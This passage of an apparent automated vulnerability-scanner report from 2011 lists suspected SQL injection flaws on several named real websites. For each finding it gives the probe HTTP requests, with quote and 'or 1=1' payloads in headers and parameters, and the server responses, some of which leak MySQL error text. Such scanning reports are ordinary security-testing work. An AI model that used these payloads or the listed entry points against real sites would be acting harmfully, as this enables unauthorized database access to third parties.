{
position: absolute;
margin: auto;
left: 0px;
top: 0px;
z-index: 100;
}

div.logo_center_img1
{
display:block;
position:absolute;
top:0;
left:0;
background:#ffffff;
z-index: -101;
width:100%;
height:100%;
}
</STYLE>

<title>brad pay test-DEL</title>
<script type="text/javascript" src="/js/s
...[SNIP]...

Request 2

GET /publication?m=1219116103717%20or%201%3d2--%20&l=1 HTTP/1.1
Host: www.flashedition.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Tue, 25 Jan 2011 13:14:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Length: 188
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

<html>
<head>
<title>Publication Not Available</title>
</head>
<body>
<h1>Publication Not Available</h1>
<p> The publication you requested is not available </p>
</body>
</html>

1.57. http://www.forrent.com/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.forrent.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 25 Jan 2011 00:02:42 GMT
Server: Apache
Set-Cookie: PHPSESSID=2v447h9l914bldd8unjud8f0u5; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Server-Id: W4
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET / HTTP/1.1
Host: www.forrent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:02:42 GMT
Server: Apache
Set-Cookie: PHPSESSID=cuu6a26mcq4h6cje48t55vq184; path=/, test_element_id=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: test_element_id=0; expires=Mon, 25-Apr-2011 00:02:42 GMT; path=/
X-Server-Id: W6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 52499

   
<!doctype html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head dir="ltr" lang="en-us" profile="http://purl.org/uF/2008/03/ http://purl.org/uF/hCard/1.0/ http://gmpg.org/xfn/11">
   <meta http-equi
...[SNIP]...

1.58. http://www.kiteship.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:43:03 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2011-01-24'' at line 1</font>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:43:04 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.59. http://www.kiteship.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiteship.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:31 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 14074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...
<font color="red">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = '2011-01-24'' at line 1</font>
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.kiteship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:41 GMT
Server: Apache/1.3.42 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: text/html
Content-Length: 13478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>KiteShip - Innovatio
...[SNIP]...

1.60. http://www.linkagogo.com/go/AddNoPopup [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:38 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27ewoY"
Last-Modified: Tue, 25 Jan 2011 04:42:39 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:38 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-
...[SNIP]...

Request 2

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:40 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27exHo"
Last-Modified: Tue, 25 Jan 2011 04:42:41 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:39 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-size:10pt;
z-index:2;
vis
...[SNIP]...

1.61. http://www.linkagogo.com/go/AddNoPopup [url parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. The payloads 18557380'%20or%201%3d1--%20 and 18557380'%20or%201%3d2--%20 were each submitted in the url parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /go/AddNoPopup?url={u}18557380'%20or%201%3d1--%20&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:13 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27eqhw"
Last-Modified: Tue, 25 Jan 2011 04:42:14 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16332
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:13 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-
...[SNIP]...

Request 2

GET /go/AddNoPopup?url={u}18557380'%20or%201%3d2--%20&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:42:14 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27eqxY"
Last-Modified: Tue, 25 Jan 2011 04:42:15 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16332
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:42:14 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:42:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_smart.xml" title="linkaGoGo Smart Bookmarks" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<head><title>Add bookmark</title>
<style>
a:link {color:#0000FF}
a:visited {color:#800080}
a.menu {text-decoration:none;color:#000000;background:#9999FF }
a.menu2 {text-decoration:none;color:#000000;background:#CCCCFF }
a.menu:link {color:#000000}
a.menu:visited {color:#000000}
a.menu:hover {color:white;background:#0000C0}
a.menu:active {color:#000000;background:#9999FF}
a.menu2:link {color:#000000}
a.menu2:visited {color:#000000}
a.menu2:hover {color:white;background:#0000C0}
a.menu2:active {color:#000000;background:#CCCCFF}
a.donate {text-decoration:none;color:#000000;background:#9999FF}
a.donate:link {color:#000000}
a.donate:visited {color:#000000}
a.donate:hover {color:white;background:#0000C0}
a.donate:active {color:#000000;background:#9999FF}
.menuskin{position:absolute;width:165px;background-color:#FFFFC6;border:2px solid silver;font:normal 12px verdana;line-height:16px;z-index:100;visibility:hidden;}
.menuskin a{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}
.menuskin a:visited{text-decoration:none;color:black;padding-left:10px;padding-right:10px;}

#mouseoverstyle{background-color:highlight;}
#mouseoverstyle a{color:white;}
a.pl:hover {color:white;background:#0000C0}
.popup
{
position:absolute; left:0; top:2; width:132;
border-style:solid;
border-width:4;
border-color:#CCCCFF;
background-color:#FFFFC6;
padding:2px;
font-family:Arial;
font-size:10pt;
z-index:2;
vis
...[SNIP]...

1.62. http://www.netlingo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:26:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19

Oops, Fatal Error 1

Request 2

GET /?1''=1 HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:26:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 46138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.63. http://www.netlingo.com/add-edit/editor-guidelines.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /add-edit/editor-guidelines.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /add-edit/editor-guidelines.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /add-edit/editor-guidelines.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.64. http://www.netlingo.com/advertise/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /advertise/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/index.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/index.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.65. http://www.netlingo.com/advertise/licensing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /advertise/licensing.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/licensing.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/licensing.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.66. http://www.netlingo.com/advertise/payments.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /advertise/payments.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/payments.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/payments.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:00:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.67. http://www.netlingo.com/advertise/sponsorships.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /advertise/sponsorships.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /advertise/sponsorships.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Content-Length: 19
Connection: close
Content-Type: text/html

Oops, Fatal Error 3

Request 2

GET /advertise/sponsorships.php?1''=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...

1.68. http://www.netlingo.com/archive.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.netlingo.com
Path:   /archive.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /archive.php?1'=1 HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:00 GMT
Server: Apache/2.2.3 (CentOS)
